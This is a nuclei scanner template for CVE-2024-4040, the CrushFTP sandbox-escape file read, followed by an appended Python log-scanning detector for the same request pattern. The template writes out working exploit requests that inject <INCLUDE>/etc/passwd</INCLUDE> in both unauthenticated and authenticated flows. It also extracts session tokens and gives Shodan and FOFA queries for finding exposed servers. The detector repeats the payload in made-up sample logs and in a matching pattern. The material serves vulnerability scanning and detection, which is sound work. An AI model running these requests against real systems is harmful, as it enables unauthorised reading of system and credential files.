id: CVE-2024-4040

info:
  name: CrushFTP VFS - Sandbox Escape LFR
  author: DhiyaneshDK,pussycat0x
  severity: critical
  description: |
    VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040.
  reference:
    - https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
    - https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
    - https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
    - https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-4040
    cwe-id: CWE-94,CWE-1336
    epss-score: 0.016
    epss-percentile: 0.87316
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: crushftp
    product: crushftp
    shodan-query:
      - "html:\"CrushFTP\""
      - http.html:"crushftp"
    fofa-query: "body=\"crushftp\""
  tags: cve,cve2024,lfr,crushftp,vfs,kev

flow: |
  if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) {
    // if username or password is not provided, run the unauthenticated exploit
    http("unauth-exploit")
  } else {
    // if username and password are provided, run the login script and then the authenticated exploit
    http("login") && http("auth-exploit")
  }

http:
  # unauthenticated exploit
  - id: unauth-exploit
    raw:
      - |
        GET /WebInterface/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "root:x:"

      - type: word
        part: header
        words:
          - "text/xml"

    extractors:
      - type: regex
        name: auth
        internal: true
        part: header_1
        group: 1
        regex:
          - 'currentAuth=([0-9a-zA-Z]+)'

  # login script
  - id: login
    raw:
      - |
        GET /WebInterface/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /WebInterface/function/ HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 111
        Origin: {{RootURL}}
        Referer: {{RootURL}}/WebInterface/login.html

        command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        internal: true
        words:
          - "<response>success</response>"

      - type: word
        part: header_2
        internal: true
        words:
          - "text/xml"

    extractors:
      - type: regex
        name: auth
        internal: true
        part: header_2
        group: 1
        regex:
          - 'currentAuth=([0-9a-zA-Z]+)'

  # authenticated exploit
  - id: auth-exploit
    raw:
      - |
        POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "root:x:"
# digest: 4a0a0047304502205948e827bf5269dd832ea8fc33d44f6117231bf9ad76ba8e2cb63850d4e41fb8022100dc3dd1a4a7e74dc17bfa8f30e8cf13605fbbc7bf05806d9aca6243bf03db95ac:922c64590222798bb761d5b6d8e72950
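A defender-side check for the request pattern this template sends, added here as an example that is not part of the template or the nuclei-templates project: it parses constructed combined-format access-log lines and flags `/WebInterface/function/` requests whose query parameters carry an `<INCLUDE>` template tag. It generalizes beyond the page's `command=zip` case to any command and any parameter, and handles percent-encoded and mixed-case tags; the log lines, addresses and `c2f` values are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); addresses and traffic are made up.
SAMPLE_LOG = r'''
203.0.113.7 - - [19/Apr/2024:10:21:03 +0000] "GET /WebInterface/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Apr/2024:10:21:04 +0000] "POST /WebInterface/function/?command=zip&c2f=abc123&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Apr/2024:10:22:10 +0000] "POST /WebInterface/function/?command=zip&c2f=def456&path=%3Cinclude%3E/etc/passwd%3C/include%3E&names=/x HTTP/1.1" 200 980 "-" "curl/8.4"
192.0.2.5 - - [19/Apr/2024:10:23:00 +0000] "POST /WebInterface/function/?command=zip&c2f=ghi789&path=/reports&names=/q1.pdf HTTP/1.1" 200 40210 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# The server-side template tag abused by CVE-2024-4040; matched case-insensitively.
INCLUDE_RE = re.compile(r'<\s*include\s*>(.*?)<\s*/\s*include\s*>', re.IGNORECASE | re.DOTALL)


def inspect_request(target: str):
    """Return (command, [included paths]) for a /WebInterface/function request
    carrying an <INCLUDE> tag in any query parameter, or None otherwise."""
    parts = urlsplit(target)
    if not parts.path.startswith('/WebInterface/function'):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    included = []
    for values in params.values():
        for value in values:
            # parse_qs percent-decodes once; decode again to catch double encoding
            included.extend(m.group(1) for m in INCLUDE_RE.finditer(unquote(value)))
    if not included:
        return None
    return (params.get('command', [''])[0], included)


def scan_log(text: str):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = inspect_request(m.group('target'))
        if hit:
            findings.append({'ip': m.group('ip'), 'time': m.group('ts'),
                             'status': int(m.group('status')),
                             'command': hit[0], 'included': hit[1]})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} command={f['command']} include={f['included']} status={f['status']}")
```

A 200 response on a flagged request is the case worth triaging first; on a patched server the same request should not return file contents.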